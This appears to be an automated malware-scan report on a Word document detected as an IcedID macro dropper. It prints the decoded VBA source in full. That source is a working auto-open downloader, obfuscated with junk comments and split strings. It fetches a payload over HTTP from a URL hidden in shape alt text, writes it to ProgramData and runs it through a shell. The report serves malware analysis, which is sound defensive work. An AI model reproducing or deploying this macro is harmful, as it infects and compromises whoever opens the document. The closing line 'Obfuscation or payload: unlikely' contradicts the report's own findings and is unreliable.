MALICIOUS
Risk score: 230
Heuristics: 6

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: `Set WXfxU = CreateObject("Script" + cxEym)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts: 2

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12007 bytes | 78c712b357233fb7193e3b45427818b0dead249f622ada95ee6d0888cd8c697c |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qKlAh"
Sub Pwibp(KWqnA, Optional ByVal llSFg As String = "c:\programdata\KZggW.txt", Optional ByVal cxEym As String = "ing.FileSystemObject")
' Crawling pawn traitor vista genetics
' Entreat stagnating grating disarmed bawls
' Fluorocarbons geranium
' Antelope motorcade shakeups burbles interactional unshaven grimly
' Defacing factionalism excess
' Connoisseurs unseasonably stagflation perceived haul
' Turbocharged reverser westwards erred geldings uneasily
' Sexists propelling
' Airlifted debts coronal
' Signatory transcriptional footnotes
' Testifying hunts
' Atonality unquantifiable abominate
' Acclamations lilacs diocesan
' Poppycock
' Covalent eyeglass inventors dimly
' Cashed fatal octagonal throngs claps
' Unowned
' Pioneers cretinous coloury
Set WXfxU = CreateObject("Script" + cxEym)
' Computably sandwiched disease
' Curare
' Diluent personified boated hour
' Leftists idolatrous weeklies sermons
' Retouching patronised regularities
Set kcGSe = WXfxU.CreateTextFile(llSFg)
' Passers petrochemical checkup dauber displacer
' Deleteriously grandmother ordaining
' Brighten unbraced keel
' Twirled neurosurgeons dignify
' Insecure aegean stony
' Manually rudeness workloads blithe
' Chaffinch statuary leadership subversive
' Absence committee kept reiterated insertion
kcGSe.WriteLine KWqnA
' Collies entries
' Fruited hairsplitting
' Bombastic stoutest
' Unctuously tendril headlamp
' Halfway aquifers punted
' Feet eukaryotic overripe copout railways wreckage
kcGSe.Close
' Liverish painfulness dependence
' Intercom toward disbanding
' End eggshells attacking puddle sulkily astonished
' Slim
' Precision mount distributable fawned stormtroopers evict
' Sunflowers news
' Sundry slithered
' Oscillator islets malleable
' Hammocks reconditioned
' Salver gambles
' Provincial gating profitable stunted neptunium
' Cursed bided unbolt cab bicker
' Adherents
' Medieval gorgon tight
' Misguide exhibitor
' Allowable
' Hopped woollier
' Gastric floored jeopardised calorimetry
' Bacteriophage
' Majestic chromosome bosnia proportions misbegotten
' Groove
' Sunburst negotiators anatomy
' Lustier goldsmith overcommitments
' Skyscraper irreproachable supplemental
' Proverbs figs promulgating interchangeability
' Liberty roar retains exmembers
' Fibbed vends arithmetical communicate fruited tossup
' Consists
' Toothbrushes fruition differing
' Petrification multiplier phoning tombs
' Guzzling salutations
' Fines mellow
' Style interleave lustily
' Joiners expunges
' Stations floridly couther deary
' Uncured product
' Finances certified
' Unnatural neatly corpse enclave sordidness
End Sub
' Tailorable despair heckler reabsorb
' Mutinous magisterial amber
' Plaything loosing embalming
' Rioting basrelief grid inchoate
Sub AutoOpen()
' Schemas alarmingly belongs physiotherapy indifferent anise
' Systematise laryngeal overlie interchanges
' Whereabouts centralise lignite soccer committed
' Quarrelled neoplasm
' Compulsive slurp
' Drinkable knavery
' Headaches truncates longings profiles
' Forge
' Actuating utters
' Troublemakers entertained unacceptably deportees
' Crotchless trot
' Oiliest
' Behaviour breathing agaves whee
' Cabriolet confusable contrapuntal evenhanded
' Induced galoshes trumped
' Servicemen reaffirmation
' Scintillating
' Pessimistic stories zany excessively prophetically
' Barb
' Infidelities population entrepreneurs
' Gravel shortened rigged nippon hypothetical
' Putrescent dinar shogun submerging
' Giantkiller sensing refining
' Litigious
' Retry nonplussed
' Bookkeeper cancellation clouted scold
' Monumentally guanaco manufactured headiest livelihoods uneaten analogues
' Statures gushing stalemates
' Shrieker
' Nutritionists pushy trimming thymus lento
Dim xLYGQ As New iekTC
' Peerless jubilees sails
' Liquefied suntanned thermodynamic avoided watchman engulfing
' Pontificating distributional wildfires
' Embolden cheeses
' Exacts
KWqnA = xLYGQ.qyItw("MSXML2.serverXMLHTTP")
' Catalysts cure
' Trilby sties pawnbrokers handover borehole broaden
' Shames kingpin
' Vibrations exonerates pianoforte diagnosing
' Chaffinch doublecross merited
Pwibp oHFrs(KWqnA)
' Stillborn inherently dither incompatibilities
' Ageless crystallography
' Triathlon injection unlovable instrumentalists pickpocket
' Widens
' Goalless impelling dehydrated validation
' Statistician internals unearth
' Fusiliers asbestosis buffetings cube
' Homogeneously halfsister velour reintroduction seared binary ripoff
' Dodo jetplane
' Clutched sixteenth tyrannies
' Bunches objected slither overstress yoyo
' Railwayman impeachment lagging saltier
' Feverish grafted juniper innocuousness
TSAAx ICfFi(0) + "vr32 c:\programdata\KZggW.txt", "ws"
End Sub
Function OSvvN(cIMvm, ZnTIz)
' Localities
' Ethanol unction heaping
' Liquidising saw
' Exploit
' Tossup
OSvvN = Split(cIMvm, ZnTIz)
End Function
Attribute VB_Name = "Ozgaj"
' Folio weak broach mink purchases home predominantly
' Chafes jell
' Creaky
' Psychoanalyse pawn reminders
Function oHFrs(CCJEE)
' Groomed intact heterosexuality
' Compound encore
' Lotus certainly imaginative lecherous
' Obstacle carcass teatime rearrangements standby
oHFrs = StrConv(CCJEE, vbUnicode)
' Ruining ruining
' Bladed mastodon monopoles angstroms
' Apian officerships hirsuteness nits
' Gloom follows
' Irrelevancy singular
End Function
' Four globule
' Lambing analyst
' Egotists swimsuits reoccupied scorned propels lovely
' Instructor
' Intangible amalgamating popup
' Rime censoring
' Eosin irradiating checkup geodesic envelops
Function QanMi()
' Retelling baton daintily
' Reapplying frolics
' Daemonic badly romancer boar
' Surrendering poles graphic compromises termini
' Materialise elixirs separability tradings eases crouching crewed
' Endometriosis transcription flexed
' Cervix superior
' Rubberstamping sociologically accosting collided gulping dotty
' Cramming newsagent oversimplification
' Symbolise reimporting
' Presumptuously escalator abducts thorax mediation
' Fixates defiled cloudiness crucify
With ActiveDocument.shapes(1)
QanMi = .AlternativeText
End With
End Function
' Hastily homecoming
' Revving foot toady erotically
' Enchantments handicrafts
' Commutative clearcut asymptotically propensity glazing
Function ICfFi(nLcSW)
' Oner ensigns radial nobility dissonance inquires
' Punters fascia jigs
' Badly
' Vows propulsion combusts
' Investigate decoupling pretentiousness
' Warranty ovular
' Fulminating
' Intruded pennames knavery
' Declension clapper nobles immovable
' Synthesise purposive
mlrSH = QanMi()
PsYGo = OSvvN(mlrSH, "###")
gwFEB = PsYGo(nLcSW)
ICfFi = gwFEB
End Function
Attribute VB_Name = "iekTC"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Typical grits refilling cowgirls motherland
' Novelle disinfectants
' Fairgrounds perjury
' Enchanter transcripts irreparable cobwebbed
' Teacup thoroughness
Function qyItw(swpei)
' Hospitalised unpasteurised soaked
' Thou tongue
' Axon highest decompositions unleashed whisperings
' Magnificent endued imploringly
' Bowels
' Sticklebacks impi grouper gums
' Tropic unforgiving practicals
Dim qYntn As Object
' Herbaceous senseless deprave
' Chew overlies majorities
' Broil bolsters
' Crumpets stellar
' Silently stairway fathomed
' Fixers rampant atonic festoons treadle
' Tossing scooting hypercholesterolaemia pears itchy
' Fullstop amateur
' Militaristic transferred nonevent
' Pacer
' Misalignment winsome
' Merchantability forbearing
' Kaleidoscopic internationalisation
' Conformation debits frugal formats
' Deactivation illiquid
Set qYntn = CreateObject(swpei)
' Concussion dismiss
' Gravitation maturer
' Acoustically dumfounding stemming homogenised spellers
' Midden
' Copyist sometimes
' Rasing fluxes tip
' Sailcloth packings replicator
' Gargled moneyless
' Slicked handcuff
' Bustling softly wet diabolic user shareholdings midsummer
' Coquettes repeals senatorial
' Batmen little colourants lemming
' Courteous turntables polygamous uvular
' Dissident twee gannet rigour
' Unproven bishopric ottoman
' Slurs hobbyists lobs private begins
' Bistro helix
' Ransoming overshoot
' Reinitialising heartwood knacks mimetic
' Silkier barefooted businessman imperiously hydrostatics
' Exclusiveness landscaped
zJxWz = ICfFi(1)
' Taipei tadpoles worldwide quintessential artisans
' Overture tabasco
' Metamorphose pejorative
' Compartmentalised clouted rustle contraceptive backhanded
qYntn.Open "GET", Reverse(zJxWz), False
' Burr jabbered whisky dilutes retort testicle assiduously
' Sunburst redaction nadir placental pedestal
' Mismatch impugn hamitic chose byway
' Cuckoos gatherer
' Erogenous winery technical transcend
' Nail thumb oriented borders legitimated incentives
qYntn.Send
' Launder insurance freshwater gluten
' Hinted correspond superimposes downturns cackled
' Accomplices fascinatingly zambia
' Lured esteems
' Drawbacks stabiliser pacemen
qyItw = qYntn.responsebody
End Function
Attribute VB_Name = "nkmqO"
Sub TSAAx(lbYzE, YMXyH)
' Jumps please beneficent perfunctory sepulchres mundane
' Introduced pursues candies
' Littler envelops
' Demist destroyer
' Foxhounds comparability rustiest
' Callings enthused creamier hiccup silliest
' Surrendered metier
Set rKlfP = CreateObject(YMXyH + "cript.shell")
' Heroic cull
' Brought bipeds
' Shocking ominous compelled holdable
' Tolerably
' Benefaction hallway hackable inequality
' Metallurgy peruse jaded
' Quasilinear sorcery polytheists
' Fishier overkill clasps
' Forbade
' Geosynchronous scrum mayflower
' Saddlebag fortification
' Cream intellectual yearlings delhi lettuces distressed
' Depopulation
' Readjusting withdrawing continuum consultant racketeering attempted edged
' Patination transcendentally reposing regular
' Folio drivelling
' Defects worthies
' Cuckoo debate
' Bind
' American soakings overqualified bumpy
' Rucksack collided dismays huskier upgraded
' Toppled registries
' Fittingly intruder
' Vacua umbilical liaises smallish applications manoeuvrings
' Acidic happier
' Encrust uplands investiture
' Reopens strangles leashes dynamism finite
' Talking bumblers deed rosiest
' Mole gladdened airfield nightdress
' Apocalyptic wingspan depressed starker
' Interest booze adherent
' Signifier cautioning rears ought
' Levelheaded unbelievable crosscountry rhapsody sumptuousness android
' Establishments shortcircuiting practitioner mush clans adenoma
' Far yiddish metastatic coconut
' Waterproofs musts
' Modernised stretchy henpeck
' Carbide conserved correspondent technique
' Invective gatecrash
' Crossbred denotation branched
' Redundant meeting logicality
' Moveable inadvisedly
' Factorisable qualifiers
' Pertly candour
' Reburial
rKlfP.exec lbYzE
' Witchdoctor secessionists dementedly beanbag unremarked
' Spiritually boom vegetive radiantly
' Scot gibbons wide exulting herbicide
' Improves avenue oasis purposely qualifier
' Munificent send oversensitive
' Modesty innately imploring
End Sub
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 44544 bytes | 3410665280f6396a5415794baaee7c48ecd51ba6f95052ce8c63cf99a7d0c1b1 |

Detection: ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely